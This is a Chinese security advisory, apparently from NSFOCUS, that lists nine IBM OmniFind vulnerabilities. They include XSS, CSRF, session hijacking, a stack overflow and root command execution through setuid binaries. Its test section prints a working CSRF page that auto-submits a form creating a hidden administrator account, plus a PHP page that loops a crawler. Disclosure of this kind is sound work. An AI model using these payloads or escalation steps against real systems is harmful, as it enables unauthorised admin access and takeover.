安全研究
安全漏洞
IBM OmniFind多个远程安全漏洞
发布日期:2010-11-09
更新日期:2010-11-16
受影响系统:
IBM OmniFind Enterprise Edition 9.1描述:
IBM OmniFind Enterprise Edition 8.5
BUGTRAQ ID: 44740
CVE ID: CVE-2010-3890,CVE-2010-3891,CVE-2010-3892,CVE-2010-3893,CVE-2010-3894,CVE-2010-3895,CVE-2010-3896,CVE-2010-3897,CVE-2010-3898,CVE-2010-3899
OmniFind是一款企业搜索和文本分析平台。
OmniFind的企业版中存在多个安全漏洞,本地或远程攻击者可以利用这些漏洞提升权限、执行跨站脚本、跨站请求伪造、会话固定攻击,或完全入侵有漏洞的系统。
1) 没有正确的过滤提交给ESAdmin/collection.do的command参数便返回给了用户,这可能导致在用户浏览器会话中注入并执行任意HTML和脚本代码。
2) OmniFind未经有效性检查便允许用户通过HTTP请求执行某些操作,这可能导致跨站请求伪造攻击。
3) 处理会话中的错误可能导致劫持其他用户的会话。
4) /opt/IBM/es/lib/libffq.cryptionjni.so下的Java_com_ibm_es_oss_CryptionNative_ESEncrypt()函数中存在栈溢出,攻击者可以通过向管理界面提交超长的password参数来触发这个漏洞。
5) /opt/IBM/es/bin/esRunCommand setuid程序运行以参数形式提供的命令,这可能导致以root用户权限执行任意shell命令。
6) /opt/IBM/es/bin/estaskwrapper setuid程序错误的运行了estasklight命令,通过将ES_LIBRARY_PATH和PATH环境变量设置为包含有恶意二进制程序的目录并运行程序就会导致权限提升。
7) ESSearchApplication/palette.do脚本缺少认证,可能导致更改服务器的配置。
8) 在索引网页时Web Crawler代理中的漏洞可能导致耗尽服务器资源。
9) 配置页面和不安全设置cookie路径相关的漏洞可能导致信息泄露。
<*来源:Fatih Kilic
链接:http://secunia.com/advisories/42119/
http://security.fatihkilic.de/advisory/fkilic-sa-2010-ibm-omnifind.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head><title>Some seemingly benign web-site</title></head>
<body onLoad="document.forms[0].submit();">
<form method="post"
action="http://omnifind-host/ESAdmin/security.do">
<input type="hidden" name="command" value="saveNewUser"/>
<input type="hidden" name="user.name" value="joemueller"/>
<input type="hidden" name="user.role" value="0"/>
<input type="hidden" name="user.allCollections" value="true"/>
<input type="hidden" name="apply" value="OK"/>
</form>
</body>
</html>
/* loop.php */
<?php
$numb = rand();
echo $numb.'<br><a href="loop.php?value='.$numb.'">click me</a>';
?>
建议:
厂商补丁:
IBM
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ers.ibm.com/
浏览次数:3053
严重程度:0(网友投票)
绿盟科技给您安全的保障